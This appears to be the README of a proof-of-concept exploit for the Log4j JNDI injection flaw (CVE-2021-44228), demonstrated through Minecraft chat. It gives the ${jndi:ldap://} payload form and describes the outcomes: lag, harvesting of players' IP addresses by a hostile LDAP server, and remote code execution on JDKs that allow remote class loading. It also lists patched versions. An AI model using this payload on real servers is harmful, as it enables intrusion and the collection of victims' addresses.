# Proof of Concept for Log4j (CVE-2021-44228)

## Disclaimer

This project is only for educational purposes.


## Introduction

This is a proof of concept of the log4j rce adapted from HyCraftHD.

Here are some links for the CVE-2021-44228:

This bug affects nearly all log4j2 and maybe log4j1 versions. The recommended version to use is **[2.15.0](** which fixes the exploit.

## Demonstration with minecraft (which uses log4j2)

- Details for the impact on minecraft are listed here:
- Article from minecraft is here:
- Fixed minecraft forge versions:
- Detailed article from minecraft forge:
- Fixed minecraft fabric versions:
- Fixed minecraft paper versions:
- Fixed minecraft spigot versions:
- Fixed minecraft sponge versions:

### Lag or sending serialized data 

- Paste ``${jndi:ldap://}`` in the chat. If there is an open socket on port ``389`` logj4 tries to connect and blocks further communiction until a timeout occurs.
- When using this proof of concept exploit, the log in the console will log ``THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT!`` which is a serialized string object from the ldap server.


- Additionally the malicious ldap server receives every ip address where the message is logged. This means that ip adresses of players on a server can be collected which this exploit.

### RCE

- Paste ``${jndi:ldap://}`` in the chat. If ``-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`` is set to true the remote code execution will happen.


- Fortunately modern jdks disable remote class loading by default. (
- Old versions may still allow this!!